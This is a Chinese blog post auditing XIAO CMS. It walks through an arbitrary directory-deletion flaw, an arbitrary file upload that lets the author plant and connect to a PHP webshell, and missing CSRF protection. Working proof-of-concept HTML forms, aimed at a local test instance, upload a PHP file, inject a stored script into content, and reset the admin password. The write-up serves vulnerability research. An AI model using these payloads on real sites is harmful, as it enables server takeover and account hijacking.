XIAO CMS审计

栏目: 编程工具 · 发布时间: 7年前

内容简介:他没有判断referer是从哪里来的,可以随意csrf,举两个例子任意添加一个xss面板改管理员的密码

翻安全客的时候看到xiao cms爆了6个cve审计一下

XIAO CMS审计

任意目录删除

XIAO CMS审计

跟进一下database.php

看到action是import找到那个函数

XIAO CMS审计

可以看到 paths 这个post参数并没有对 ./ 进行过滤,可以进行任意文件删除,而且payload的paths参数应该是post=。=

放一个自己的目录测试一下

XIAO CMS审计

创建了一个 ckj123 的目录,试下能不能删除

XIAO CMS审计 XIAO CMS审计

成功

任意文件上传

XIAO CMS审计

很明显的可以看到uploadfile.php文件

找到上传文件的地方

所有的upload需要一个upload函数

XIAO CMS审计

看到他加载了一个叫做upload的类

然后获得了文件最后的扩展名,判断了是图片还是别的文件

跟进upload

XIAO CMS审计

跟进upload类

XIAO CMS审计

里面有个过滤的地方

XIAO CMS审计 XIAO CMS审计

获得后缀,跟限制的类型进行比较

XIAO CMS审计

可以看到这个type是需要自己传进去的

XIAO CMS审计

总共两个action

下面那个的type是规定死的

发现上面那个的type是需要自己传进去的这就可以传 php 文件了

XIAO CMS审计
<html>
    <body>
    <form action="http://127.0.0.1:8080/admin/index.php?c=uploadfile&a=uploadify_upload&type=php&size=1000" method="post" enctype="multipart/form-data">
    <input type="file" name="file" />
    <input type="submit" name="submit" value="submit" />
    </form>
</body>
</html>

CVE给的payload不对。。

XIAO CMS审计

成功了,然后连接一下这个马

XIAO CMS审计

CSRF

他没有判断referer是从哪里来的,可以随意csrf,举两个例子

任意添加一个xss面板

<html>
  <body>
    <form action="http://127.0.0.1:8080/admin/index.php?c=content&a=add&catid=3" method="POST">
      <input type="hidden" name="data[catid]" value="3" />
      <input type="hidden" name="data[title]" value="test" />
      <input type="hidden" name="data[thumb]" value="" />
      <input type="hidden" name="data[keywords]" value="" />
      <input type="hidden" name="data[description]" value="" />
      <input type="hidden" name="data[content]" value="<script>alert(1)</script>" />
      <input type="hidden" name="data[xiao_auto_description]" value="1" />
      <input type="hidden" name="data[xiao_auto_thumb]" value="1" />
      <input type="hidden" name="data[xiao_download_image]" value="1" />
      <input type="hidden" name="data[time]" value="2018-11-02+15:05:43" />
      <input type="hidden" name="data[hits]" value="" />
      <input type="hidden" name="submit" value="提交" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

改管理员的密码

<form action="http://127.0.0.1:8080/admin/index.php?c=index&a=my" method="POST">       
<input type="hidden" name="data[password]" value="1234567">
<input type="hidden" name="submit" value="提交" />
<input type="submit" value="Submit request" />
</form>

后记

xss的漏洞没看,以后有空补上


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

计算机是怎样跑起来的

计算机是怎样跑起来的

[日] 矢泽久雄 / 胡屹 / 人民邮电出版社 / 2015-5 / 39.00元

本书倡导在计算机迅速发展、技术不断革新的今天,回归到计算机的基础知识上。通过探究计算机的本质,提升工程师对计算机的兴趣,在面对复杂的最新技术时,能够迅速掌握其要点并灵活运用。 本书以图配文,以计算机的三大原则为开端、相继介绍了计算机的结构、手工汇编、程序流程、算法、数据结构、面向对象编程、数据库、TCP/IP 网络、数据加密、XML、计算机系统开发以及SE 的相关知识。 图文并茂,通俗......一起来看看 《计算机是怎样跑起来的》 这本书的介绍吧!

HTML 压缩/解压工具
HTML 压缩/解压工具

在线压缩/解压 HTML 代码

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具